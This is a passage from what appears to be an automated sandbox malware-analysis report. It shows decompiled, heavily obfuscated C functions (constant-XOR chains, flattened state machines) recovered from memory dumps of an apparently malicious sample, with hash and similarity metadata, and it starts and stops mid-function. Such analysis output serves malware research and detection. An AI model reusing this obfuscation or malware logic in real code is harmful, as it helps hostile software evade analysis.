                                          				_v16 = _v16 ^ 0x0025b62f;
                                          				_v32 = 0xbd8b;
                                          				_v32 = _v32 ^ 0xdfb27dce;
                                          				_v32 = _v32 / _t155;
                                          				_v32 = _v32 ^ 0x0a2b09ce;
                                          				_v28 = 0xad22;
                                          				_t156 = 0x34;
                                          				_v28 = _v28 * 0x47;
                                          				_v28 = _v28 + 0x4161;
                                          				_v28 = _v28 ^ 0x00307d44;
                                          				_v36 = 0xa165;
                                          				_v36 = _v36 >> 2;
                                          				_v36 = _v36 ^ 0x00006be3;
                                          				_v12 = 0xca43;
                                          				_v12 = _v12 << 7;
                                          				_v12 = _v12 + 0x4480;
                                          				_v12 = _v12 >> 0x10;
                                          				_v12 = _v12 ^ 0x00004998;
                                          				_v44 = 0xc326;
                                          				_v44 = _v44 / _t156;
                                          				_v44 = _v44 ^ 0x000051cc;
                                          				_v40 = 0xa768;
                                          				_v40 = _v40 / _t156;
                                          				_v40 = _v40 ^ 0x00002cdd;
                                          				_v24 = 0x8f0;
                                          				_v24 = _v24 << 2;
                                          				_v24 = _v24 + 0xffff08f5;
                                          				_v24 = _v24 | 0x28f06395;
                                          				_v24 = _v24 ^ 0xffff76ac;
                                          				_v20 = 0x26e;
                                          				_v20 = _v20 + 0xffffc9ca;
                                          				_v20 = _v20 + 0x3d88;
                                          				_v20 = _v20 * 0x16;
                                          				_v20 = _v20 ^ 0x00008c1f;
                                          				_v48 = E006D8C8F(_t156);
                                          				_v8 = 0xba8c;
                                          				_v8 = _v8 + 0xffff546f;
                                          				_v8 = _v8 | 0xb28855c5;
                                          				_v8 = _v8 ^ 0xa47da239;
                                          				_v8 = _v8 ^ 0x16f5fdc2;
                                          				_v16 = 0x4025;
                                          				_t157 = 0xb;
                                          				_v16 = _v16 / _t157;
                                          				_v16 = _v16 + 0xffffba03;
                                          				_t158 = 0x3b;
                                          				_v16 = _v16 / _t158;
                                          				_v16 = _v16 ^ 0x0456c691;
                                          				_t174 = E006C78A5(_t158, _t158, _v16, _t158, _v8);
                                          				E006C7787(_v44, _t174, _v40,  &_v48, _v24, _v20, _t173);
                                          				 *((short*)(_t173 + _t174 * 2)) = 0;
                                          				return 0;
                                          			}






















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: D}0
                                          • API String ID: 0-882559769
                                          • Opcode ID: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
                                          • Instruction ID: 72eaa12fba66a1ced6fe282a5366b19b0a2e272834111ccc6704cffb7baa0780
                                          • Opcode Fuzzy Hash: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
                                          • Instruction Fuzzy Hash: 2251F3B2D0120AEBDF09CFA5C94A8EEBBB2FB44314F108199E111B6290D7B95B55CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E006D340A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				char _v76;
                                          				intOrPtr _v80;
                                          				intOrPtr _v84;
                                          				intOrPtr _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				signed int _v116;
                                          				signed int _v120;
                                          				signed int _v124;
                                          				void* _t88;
                                          				void* _t94;
                                          				void* _t100;
                                          				void* _t102;
                                          				intOrPtr _t117;
                                          				signed int _t118;
                                          				signed int* _t121;
                                          
                                          				_t116 = _a8;
                                          				_t100 = __edx;
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t88);
                                          				_v88 = 0x94797;
                                          				_t117 = 0;
                                          				_v84 = 0xfccb1;
                                          				_t121 =  &(( &_v124)[4]);
                                          				_v80 = 0;
                                          				_v120 = 0xe518;
                                          				_t102 = 0x2e39b5d1;
                                          				_v120 = _v120 >> 0xf;
                                          				_v120 = _v120 | 0x8d2dde7f;
                                          				_v120 = _v120 ^ 0x46a7e325;
                                          				_v120 = _v120 ^ 0xcb8a2201;
                                          				_v124 = 0x16d5;
                                          				_v124 = _v124 >> 0xe;
                                          				_v124 = _v124 | 0x69fc1cf8;
                                          				_t118 = 0x78;
                                          				_v124 = _v124 * 0x21;
                                          				_v124 = _v124 ^ 0xa97fd862;
                                          				_v104 = 0xc3ad;
                                          				_v104 = _v104 * 0x54;
                                          				_v104 = _v104 ^ 0x00400d02;
                                          				_v112 = 0x42c5;
                                          				_v112 = _v112 ^ 0xf5e3cf1a;
                                          				_v112 = _v112 ^ 0xb2e8281c;
                                          				_v112 = _v112 | 0x1ecbfa7f;
                                          				_v112 = _v112 ^ 0x5fcbcd35;
                                          				_v96 = 0xbfa3;
                                          				_v96 = _v96 ^ 0x0400a118;
                                          				_v96 = _v96 ^ 0x04005591;
                                          				_v116 = 0x719c;
                                          				_v116 = _v116 / _t118;
                                          				_v116 = _v116 << 3;
                                          				_v116 = _v116 + 0xbb41;
                                          				_v116 = _v116 ^ 0x0000fc42;
                                          				_v100 = 0x8c7a;
                                          				_v100 = _v100 << 3;
                                          				_v100 = _v100 ^ 0x0004412d;
                                          				_v92 = 0xd0f9;
                                          				_v92 = _v92 + 0xffffb579;
                                          				_v92 = _v92 ^ 0x0000a3c3;
                                          				_v108 = 0x6440;
                                          				_v108 = _v108 ^ 0x55818320;
                                          				_v108 = _v108 << 0xf;
                                          				_v108 = _v108 + 0x2c19;
                                          				_v108 = _v108 ^ 0xf3b003dd;
                                          				do {
                                          					while(_t102 != 0x4681a3b) {
                                          						if(_t102 == 0xbf6d415) {
                                          							__eflags = E006CB055(_v92, _v108, __eflags,  &_v76, _t116 + 4);
                                          							_t117 =  !=  ? 1 : _t117;
                                          						} else {
                                          							if(_t102 == 0x17b92136) {
                                          								E006D50F2( &_v76, _v120, _v124, _v104, _t100);
                                          								_t121 =  &(_t121[3]);
                                          								_t102 = 0x4681a3b;
                                          								continue;
                                          							} else {
                                          								if(_t102 != 0x2e39b5d1) {
                                          									goto L10;
                                          								} else {
                                          									_t102 = 0x17b92136;
                                          									continue;
                                          								}
                                          							}
                                          						}
                                          						L13:
                                          						return _t117;
                                          					}
                                          					_t94 = E006D8F11( &_v76, _v112, _v96, _t116, _v116, _v100);
                                          					_t121 =  &(_t121[4]);
                                          					__eflags = _t94;
                                          					if(__eflags == 0) {
                                          						_t102 = 0x114ebae0;
                                          						goto L10;
                                          					} else {
                                          						_t102 = 0xbf6d415;
                                          						continue;
                                          					}
                                          					goto L13;
                                          					L10:
                                          					__eflags = _t102 - 0x114ebae0;
                                          				} while (__eflags != 0);
                                          				goto L13;
                                          			}
























                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: @d
                                          • API String ID: 0-4219467963
                                          • Opcode ID: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
                                          • Instruction ID: b7a1d3383e4ef84cb93354ebcea1bd91a63089b4ee2b038303f2890c5c72a6e4
                                          • Opcode Fuzzy Hash: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
                                          • Instruction Fuzzy Hash: 205177B15083429BD318CF21D94A91FFBE2FBD4748F504A1EF596A2260D775CA0A8B87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E006D3FE7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				char _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				void* _t80;
                                          				signed int _t94;
                                          				signed int _t95;
                                          				void* _t98;
                                          				void* _t114;
                                          				void* _t115;
                                          				void* _t117;
                                          				void* _t118;
                                          
                                          				_push(_a8);
                                          				_t114 = __ecx;
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t80);
                                          				_v96 = 0xd1bf;
                                          				_t118 = _t117 + 0x10;
                                          				_t115 = 0;
                                          				_t98 = 0x349149b3;
                                          				_t94 = 0x64;
                                          				_v96 = _v96 / _t94;
                                          				_v96 = _v96 ^ 0x00007874;
                                          				_v104 = 0x2a01;
                                          				_v104 = _v104 + 0x4d1a;
                                          				_v104 = _v104 + 0xb0bd;
                                          				_v104 = _v104 ^ 0x00017b91;
                                          				_v108 = 0x44db;
                                          				_v108 = _v108 + 0xffff0b38;
                                          				_t95 = 0x1c;
                                          				_v108 = _v108 * 7;
                                          				_v108 = _v108 ^ 0xfffb0952;
                                          				_v112 = 0x5707;
                                          				_v112 = _v112 + 0x69dd;
                                          				_v112 = _v112 + 0xef17;
                                          				_v112 = _v112 | 0x7086095e;
                                          				_v112 = _v112 ^ 0x7087ed58;
                                          				_v92 = 0x8129;
                                          				_v92 = _v92 >> 3;
                                          				_v92 = _v92 ^ 0x00001eae;
                                          				_v80 = 0x8f03;
                                          				_v80 = _v80 ^ 0x5fd75a11;
                                          				_v80 = _v80 ^ 0x5fd7f025;
                                          				_v84 = 0x94fc;
                                          				_v84 = _v84 >> 0x10;
                                          				_v84 = _v84 ^ 0x00001c7c;
                                          				_v100 = 0xd584;
                                          				_v100 = _v100 >> 0xe;
                                          				_v100 = _v100 / _t95;
                                          				_v100 = _v100 ^ 0x00001ad3;
                                          				_v88 = 0x35b5;
                                          				_v88 = _v88 * 0x43;
                                          				_v88 = _v88 ^ 0x000e607f;
                                          				do {
                                          					while(_t98 != 0x2d9dd110) {
                                          						if(_t98 == 0x2e4dc862) {
                                          							__eflags = E006D8F11( &_v76, _v80, _v84, _t114 + 8, _v100, _v88);
                                          							_t115 =  !=  ? 1 : _t115;
                                          						} else {
                                          							if(_t98 == 0x32f61d6a) {
                                          								E006D50F2( &_v76, _v96, _v104, _v108, _a8);
                                          								_t118 = _t118 + 0xc;
                                          								_t98 = 0x2d9dd110;
                                          								continue;
                                          							} else {
                                          								if(_t98 != 0x349149b3) {
                                          									goto L10;
                                          								} else {
                                          									_t98 = 0x32f61d6a;
                                          									continue;
                                          								}
                                          							}
                                          						}
                                          						L13:
                                          						return _t115;
                                          					}
                                          					__eflags = E006CB055(_v112, _v92, __eflags,  &_v76, _t114);
                                          					if(__eflags == 0) {
                                          						_t98 = 0x5080212;
                                          						goto L10;
                                          					} else {
                                          						_t98 = 0x2e4dc862;
                                          						continue;
                                          					}
                                          					goto L13;
                                          					L10:
                                          					__eflags = _t98 - 0x5080212;
                                          				} while (__eflags != 0);
                                          				goto L13;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: tx
                                          • API String ID: 0-1414813443
                                          • Opcode ID: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
                                          • Instruction ID: a7bd4ae37e523961470bf75b646709387a5dda70caab57a88df6f36ae4a913ca
                                          • Opcode Fuzzy Hash: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
                                          • Instruction Fuzzy Hash: F4419E719083429FE758CE21C88592FBBE2FBD8718F104A1EF5C596260DB75DA09CB47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E006C60B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				char _v44;
                                          				void* _t104;
                                          				void* _t109;
                                          				signed int _t124;
                                          				signed int _t125;
                                          				signed int _t126;
                                          				void* _t128;
                                          
                                          				_push(_a20);
                                          				_t109 = __ecx;
                                          				_t111 = _a16;
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_v44 = 0x104;
                                          				_push(0x104);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(0x104);
                                          				_v8 = 0xaf29;
                                          				_v8 = _v8 >> 0xe;
                                          				_t128 = 0;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x0000662d;
                                          				_v20 = 0xac55;
                                          				_v20 = _v20 | 0x2323cee5;
                                          				_t124 = 0x4c;
                                          				_v20 = _v20 / _t124;
                                          				_v20 = _v20 ^ 0x007629b6;
                                          				_v16 = 0xabf2;
                                          				_v16 = _v16 | 0x220f7c85;
                                          				_v16 = _v16 + 0xffff7509;
                                          				_v16 = _v16 ^ 0x220f51b4;
                                          				_v40 = 0x3232;
                                          				_t125 = 0x1f;
                                          				_v40 = _v40 / _t125;
                                          				_v40 = _v40 ^ 0x00004228;
                                          				_v36 = 0x2ec1;
                                          				_v36 = _v36 | 0xae4e7a63;
                                          				_v36 = _v36 ^ 0xae4e526e;
                                          				_v12 = 0xa12f;
                                          				_v12 = _v12 << 0xe;
                                          				_v12 = _v12 << 0xb;
                                          				_v12 = _v12 << 0x10;
                                          				_v12 = _v12 ^ 0x00007580;
                                          				_v32 = 0xadd8;
                                          				_v32 = _v32 | 0x6e6f3325;
                                          				_v32 = _v32 ^ 0x5adaef9e;
                                          				_v32 = _v32 ^ 0x34b54fa4;
                                          				_v28 = 0xb293;
                                          				_t126 = 0x3b;
                                          				_v28 = _v28 * 0x2d;
                                          				_v28 = _v28 << 0xb;
                                          				_v28 = _v28 ^ 0xfb1ed4cf;
                                          				_v24 = 0x2b1c;
                                          				_v24 = _v24 * 6;
                                          				_v24 = _v24 / _t126;
                                          				_v24 = _v24 ^ 0x00001462;
                                          				_t104 = E006C7551(_a16, _v24);
                                          				_t127 = _t104;
                                          				if(_t104 != 0) {
                                          					_t128 = E006C7663(_v40, _v36, _t127, _t109,  &_v44, _t111, _v12);
                                          					E006D4F7D(_v32, _v28, _t127);
                                          				}
                                          				return _t128;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: %3on
                                          • API String ID: 2962429428-3639271662
                                          • Opcode ID: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
                                          • Instruction ID: d82897575f7c6fcae53ecdb04c91c1ea537830d6b8390fb15c34ed743e2c763d
                                          • Opcode Fuzzy Hash: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
                                          • Instruction Fuzzy Hash: B5413871E0020AABDB04DFE5C98A8EEFBB5FB44704F208159E511B7250D7B89B55CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E006CF536(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				intOrPtr _v32;
                                          				void* _t73;
                                          				signed int _t84;
                                          
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t73);
                                          				_v28 = _v28 & 0x00000000;
                                          				_v32 = 0x4854b3;
                                          				_v8 = 0xdc0b;
                                          				_t84 = 0x56;
                                          				_v8 = _v8 * 0xf;
                                          				_v8 = _v8 >> 3;
                                          				_v8 = _v8 ^ 0x0001e73e;
                                          				_v12 = 0xfbc9;
                                          				_v12 = _v12 + 0xb4de;
                                          				_v12 = _v12 * 0x28;
                                          				_v12 = _v12 ^ 0x0043d2f8;
                                          				_v12 = 0x51f2;
                                          				_v12 = _v12 + 0xffffcc79;
                                          				_v12 = _v12 + 0xffffba87;
                                          				_v12 = _v12 ^ 0xffffb404;
                                          				_v12 = 0x6c9d;
                                          				_v12 = _v12 / _t84;
                                          				_v12 = _v12 >> 1;
                                          				_v12 = _v12 ^ 0x0000581b;
                                          				_v12 = 0x414e;
                                          				_v12 = _v12 >> 0xd;
                                          				_v12 = _v12 | 0x4fdc2cbe;
                                          				_v12 = _v12 ^ 0x4fdc7af3;
                                          				_v12 = 0xe540;
                                          				_v12 = _v12 * 0x6f;
                                          				_v12 = _v12 ^ 0x1b88e412;
                                          				_v12 = _v12 ^ 0x1bebfc09;
                                          				_v24 = 0x3d7;
                                          				_v24 = _v24 + 0xffffb00b;
                                          				_v24 = _v24 ^ 0xffff901a;
                                          				_v20 = 0xd6b0;
                                          				_v20 = _v20 ^ 0xee2b6cd1;
                                          				_v20 = _v20 ^ 0xee2bf683;
                                          				_v16 = 0x5822;
                                          				_v16 = _v16 + 0xa5f;
                                          				_v16 = _v16 ^ 0x00006b11;
                                          				return E006D08F3(_v12, _v24, _v20, _a8, _t84, E006CC506(_t84), _v16);
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: j^
                                          • API String ID: 0-2773993462
                                          • Opcode ID: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
                                          • Instruction ID: 58e547acad6fd8759a1f4e2f7b5bee5414499525bfb023e861c9a33e7f6146df
                                          • Opcode Fuzzy Hash: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
                                          • Instruction Fuzzy Hash: E231E0B4C0070AEBDF48DFA4C98A59EBFB5FB00304F608089D515B62A0D3B94B959F84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			E006D5D1D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				unsigned int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				intOrPtr _v96;
                                          				void* _t165;
                                          				intOrPtr* _t183;
                                          				void* _t185;
                                          				void* _t194;
                                          				signed int _t195;
                                          				signed int _t196;
                                          				signed int _t197;
                                          				void* _t198;
                                          				void* _t199;
                                          
                                          				_t183 = _a24;
                                          				_push(_t183);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E006C602B(_t165);
                                          				_v96 = 0x1c20a7;
                                          				_t194 = 0;
                                          				_v84 = _v84 & 0;
                                          				_t199 = _t198 + 0x20;
                                          				_v92 = 0x7c153;
                                          				_v88 = 0xb2086;
                                          				_t185 = 0x2476afb9;
                                          				_v8 = 0x4175;
                                          				_v8 = _v8 + 0xffff57ff;
                                          				_v8 = _v8 | 0xfffbf4ff;
                                          				_v8 = _v8 ^ 0xffffd856;
                                          				_v56 = 0x400d;
                                          				_v56 = _v56 << 0xa;
                                          				_v56 = _v56 ^ 0x01004a82;
                                          				_v52 = 0xfa4b;
                                          				_t195 = 0x3f;
                                          				_v52 = _v52 * 0xf;
                                          				_v52 = _v52 ^ 0x000ed31b;
                                          				_v48 = 0x532b;
                                          				_v48 = _v48 | 0xa8aca4f9;
                                          				_v48 = _v48 ^ 0xa8acfbbc;
                                          				_v44 = 0x6cab;
                                          				_v44 = _v44 * 0xd;
                                          				_v44 = _v44 ^ 0x0005813c;
                                          				_v32 = 0xa076;
                                          				_v32 = _v32 + 0x7ba7;
                                          				_v32 = _v32 * 0x33;
                                          				_v32 = _v32 ^ 0x0038af53;
                                          				_v28 = 0x80ef;
                                          				_v28 = _v28 << 0xb;
                                          				_v28 = _v28 | 0xbfaa7514;
                                          				_v28 = _v28 ^ 0xbfaf1f10;
                                          				_v24 = 0x2421;
                                          				_v24 = _v24 / _t195;
                                          				_t196 = 3;
                                          				_v24 = _v24 / _t196;
                                          				_v24 = _v24 ^ 0x000050e2;
                                          				_v68 = 0xf6e5;
                                          				_v68 = _v68 >> 8;
                                          				_v68 = _v68 ^ 0x0000085c;
                                          				_v64 = 0x7950;
                                          				_v64 = _v64 | 0xc26498fa;
                                          				_v64 = _v64 ^ 0xc264e84e;
                                          				_v60 = 0xb7cc;
                                          				_v60 = _v60 + 0xffffacef;
                                          				_v60 = _v60 ^ 0x0000478a;
                                          				_v40 = 0x6379;
                                          				_v40 = _v40 >> 0xa;
                                          				_v40 = _v40 << 5;
                                          				_v40 = _v40 ^ 0x00006e22;
                                          				_v20 = 0xe665;
                                          				_v20 = _v20 << 9;
                                          				_v20 = _v20 ^ 0xe4ef8652;
                                          				_v20 = _v20 + 0xffffeafe;
                                          				_v20 = _v20 ^ 0xe52339cd;
                                          				_v80 = 0x4d1e;
                                          				_v80 = _v80 + 0xffffc710;
                                          				_v80 = _v80 ^ 0x000046ed;
                                          				_v16 = 0x18c;
                                          				_v16 = _v16 >> 4;
                                          				_t197 = _v80;
                                          				_v16 = _v16 * 0x41;
                                          				_v16 = _v16 ^ 0x73128289;
                                          				_v16 = _v16 ^ 0x7312c7aa;
                                          				_v12 = 0xdd0b;
                                          				_v12 = _v12 + 0xffff65de;
                                          				_v12 = _v12 * 0x3b;
                                          				_v12 = _v12 << 8;
                                          				_v12 = _v12 ^ 0x0f6bc641;
                                          				_v76 = 0xf5b7;
                                          				_v76 = _v76 ^ 0xdca6f1c9;
                                          				_v76 = _v76 ^ 0xdca64fd3;
                                          				_v36 = 0xdf9f;
                                          				_v36 = _v36 + 0x7ffe;
                                          				_v36 = _v36 + 0x4fda;
                                          				_v36 = _v36 ^ 0x00019ee0;
                                          				_v72 = 0x5c39;
                                          				_v72 = _v72 ^ 0x85106c7e;
                                          				_v72 = _v72 ^ 0x85105bd4;
                                          				do {
                                          					while(_t185 != 0x6efb3d4) {
                                          						if(_t185 == 0xfd0cdc7) {
                                          							_t197 = E006D96CB(_t185, _v8, _v56, _v52, _a20, _v48, 0, _v44, _v32, _a12, _t185, _a16, 0, _v28, _v24);
                                          							_t199 = _t199 + 0x38;
                                          							if(_t197 == 0) {
                                          								L15:
                                          								return _t194;
                                          							}
                                          							_t185 = 0x6efb3d4;
                                          							continue;
                                          						}
                                          						if(_t185 == 0x1eddc4e8) {
                                          							E006D96CB(_t185, _v40, _v20, _v80, _a20, _v16, _t197, _v12, _v76, _a12, _t185, _a16, _t194, _v36, _v72);
                                          							if(_t183 != 0) {
                                          								 *_t183 = _t197;
                                          							}
                                          							goto L15;
                                          						}
                                          						if(_t185 != 0x2476afb9) {
                                          							goto L11;
                                          						}
                                          						_t185 = 0xfd0cdc7;
                                          					}
                                          					_push(_t185);
                                          					_push(_t185);
                                          					_t194 = E006C8736(_t197);
                                          					if(_t194 == 0) {
                                          						_t185 = 0x710c028;
                                          						goto L11;
                                          					}
                                          					_t185 = 0x1eddc4e8;
                                          					continue;
                                          					L11:
                                          				} while (_t185 != 0x710c028);
                                          				goto L15;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Similarity
                                          • Opcode ID: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
                                          • Instruction ID: 5a1fe3d6369a9c4562b22f2a67a2511f4744ca97b333c4f1e867d052efeeb01a
                                          • Opcode Fuzzy Hash: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
                                          • Instruction Fuzzy Hash: A8912672C0060AABDF15CFE5D9895EEBFB2FF04314F208109E61276260D7B94A55CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E006D0F0C(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				void* _t132;
                                          				signed int _t149;
                                          				void* _t152;
                                          				void* _t154;
                                          				signed int _t173;
                                          				signed int _t174;
                                          				signed int _t175;
                                          				signed int _t176;
                                          				signed int _t177;
                                          				void* _t179;
                                          				void* _t180;
                                          				void* _t181;
                                          
                                          				_push(_a20);
                                          				_t152 = __edx;
                                          				_push(0xffffffff);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(0);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t132);
                                          				_v44 = 0x160;
                                          				_t181 = _t180 + 0x1c;
                                          				_v44 = _v44 ^ 0x1b432315;
                                          				_v44 = _v44 ^ 0x1b433d06;
                                          				_t179 = 0;
                                          				_v12 = 0x3352;
                                          				_t154 = 0x2476afb9;
                                          				_v12 = _v12 + 0xffffca9f;
                                          				_v12 = _v12 << 1;
                                          				_t173 = 0x29;
                                          				_v12 = _v12 / _t173;
                                          				_v12 = _v12 ^ 0x063e5c60;
                                          				_v8 = 0x701a;
                                          				_t174 = 0x52;
                                          				_v8 = _v8 / _t174;
                                          				_t175 = 0x4e;
                                          				_v8 = _v8 / _t175;
                                          				_t176 = 0x41;
                                          				_v8 = _v8 / _t176;
                                          				_v8 = _v8 ^ 0x0000431a;
                                          				_v40 = 0xf48c;
                                          				_v40 = _v40 + 0xffff0dc2;
                                          				_v40 = _v40 ^ 0x0000090f;
                                          				_v36 = 0x5475;
                                          				_v36 = _v36 << 0xf;
                                          				_v36 = _v36 ^ 0x2a3aa88b;
                                          				_v16 = 0xfc71;
                                          				_v16 = _v16 ^ 0x0a975394;
                                          				_v16 = _v16 | 0x3f9daa18;
                                          				_v16 = _v16 + 0xffff523a;
                                          				_v16 = _v16 ^ 0x3f9f63b5;
                                          				_v48 = 0xbfc9;
                                          				_t177 = 0x63;
                                          				_v48 = _v48 / _t177;
                                          				_v48 = _v48 ^ 0x0000151a;
                                          				_v32 = 0xfc2a;
                                          				_v32 = _v32 | 0x12ce1451;
                                          				_v32 = _v32 + 0x3ff4;
                                          				_v32 = _v32 ^ 0x12cf51f6;
                                          				_v56 = 0x5ac8;
                                          				_v56 = _v56 | 0xf85dcbd1;
                                          				_v56 = _v56 ^ 0xf85dd81d;
                                          				_v52 = 0x6e3;
                                          				_v52 = _v52 << 8;
                                          				_v52 = _v52 ^ 0x0006be09;
                                          				_v28 = 0x1612;
                                          				_v28 = _v28 ^ 0x471c56e0;
                                          				_v28 = _v28 >> 1;
                                          				_v28 = _v28 + 0xffff1cc1;
                                          				_v28 = _v28 ^ 0x238d2d3e;
                                          				_v24 = 0x515e;
                                          				_v24 = _v24 + 0x963f;
                                          				_v24 = _v24 + 0xffff7349;
                                          				_t178 = _v56;
                                          				_v24 = _v24 * 0x11;
                                          				_v24 = _v24 ^ 0x000650d8;
                                          				_v20 = 0x1a04;
                                          				_v20 = _v20 | 0x2258a5ab;
                                          				_v20 = _v20 + 0xffff2fa3;
                                          				_v20 = _v20 + 0x9894;
                                          				_v20 = _v20 ^ 0x2258a793;
                                          				do {
                                          					while(_t154 != 0x6efb3d4) {
                                          						if(_t154 == 0xfd0cdc7) {
                                          							_t149 = E006D7AFD(_v44, _v12, _t154, _v8, 0, _t152, 0, 0xffffffff, _v40, _v36, _a12);
                                          							_t178 = _t149;
                                          							_t181 = _t181 + 0x24;
                                          							if(_t149 != 0) {
                                          								_t154 = 0x6efb3d4;
                                          								continue;
                                          							}
                                          						} else {
                                          							if(_t154 == 0x1eddc4e8) {
                                          								E006D7AFD(_v56, _v52, _t154, _v28, _t179, _t152, _t178, 0xffffffff, _v24, _v20, _a12);
                                          							} else {
                                          								if(_t154 != 0x2476afb9) {
